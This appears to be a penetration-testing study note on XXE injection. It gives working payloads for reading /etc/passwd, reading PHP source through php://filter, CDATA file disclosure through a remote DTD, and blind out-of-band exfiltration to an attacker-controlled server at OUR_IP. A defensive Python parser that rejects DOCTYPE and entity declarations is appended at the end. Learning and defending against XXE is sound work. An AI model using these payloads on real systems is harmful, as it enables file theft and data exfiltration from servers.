XML External Entity (XXE)

XXE occurs where we can inject XML input and the XML parser processes it without sanitizing it, so the entities we declare are resolved.

Basic XXE Payloads

# Simple file read
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>

# PHP filters
<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>

Basic XXE Testing

In the image below I can see that my email is reflected back to me, so I will test that parameter for XXE.

Now I will test for basic XXE:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root>
<name>test</name>
<tel>1122112211</tel>
<email>&test;</email>
<message>sadadasdasdasd</message>
</root>

XXE PHP Filters to Read Source Code

We can now try to read source code using PHP filters; I will try to read the connection.php file:

<!DOCTYPE email [<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php">]>

Advanced File Disclosure (XXE CDATA)

If the web app is not built in PHP, then PHP filters cannot help us; instead we can use CDATA to read any sort of file, including binary data.

This will not work, because XML does not let us join internal and external entities like this, so we need to find another way.

So I will host a DTD on my Python server.

Now this payload will fetch the DTD from my Python server:

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///flag.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.163/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>

Now I can read the files as well.

Blind XXE (Out of Band Data Exfiltration)

Sometimes you don't get a response from the website, so you need to redirect the response to your own Python server.

We need to host xxe.dtd on our Python server; it contains:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

The request body sent to the target then loads that DTD and triggers the callback:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>
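As an added defensive example (not part of the original notes), the stdlib-only parser below, modelled on the approach the defusedxml library takes, shows how a backend would refuse every payload on this page regardless of language: it rejects any DOCTYPE, entity declaration or external entity reference before expat expands anything, so the file://, php://filter and out-of-band http:// entities never resolve. The sample request bodies are constructed from the basic test above.

```python
import xml.parsers.expat as expat


class XXEAttempt(Exception):
    """Raised when a document declares a DOCTYPE or entity we refuse to process."""


def parse_hardened(xml_bytes: bytes) -> dict:
    """Parse a flat form document (like the contact form above) into {tag: text}.
    Every DTD hook that XXE depends on is rejected before expat expands anything."""
    parser = expat.ParserCreate()
    # Never fetch or expand parameter entities (%xxe; / %remote; / %oob; above).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # A form body never needs a DOCTYPE; refusing it also kills internal-subset entities.
        raise XXEAttempt(f"DOCTYPE {name!r} not allowed")

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise XXEAttempt(f"entity {name!r} declared (system_id={system_id!r})")

    def reject_external(context, base, system_id, public_id):
        raise XXEAttempt(f"external entity reference to {system_id!r}")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external

    fields, stack = {}, []

    def start(tag, attrs):
        stack.append(tag)
        fields.setdefault(tag, "")

    def text(data):
        if stack:
            fields[stack[-1]] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = text
    parser.Parse(xml_bytes, True)
    return {tag: value.strip() for tag, value in fields.items()}


def is_rejected(xml_bytes: bytes) -> bool:
    """True if the hardened parser refused the document as an XXE attempt."""
    try:
        parse_hardened(xml_bytes)
    except XXEAttempt:
        return True
    return False


# Constructed sample: the basic XXE test body from this page.
XXE_BODY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<root><name>test</name><tel>1122112211</tel><email>&test;</email></root>"""

# Constructed sample: a benign submission with no DOCTYPE.
SAFE_BODY = b"<root><name>test</name><tel>1122112211</tel><email>a@b.test</email></root>"

if __name__ == "__main__":
    print(is_rejected(XXE_BODY))            # True
    print(parse_hardened(SAFE_BODY)["tel"])  # 1122112211
```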
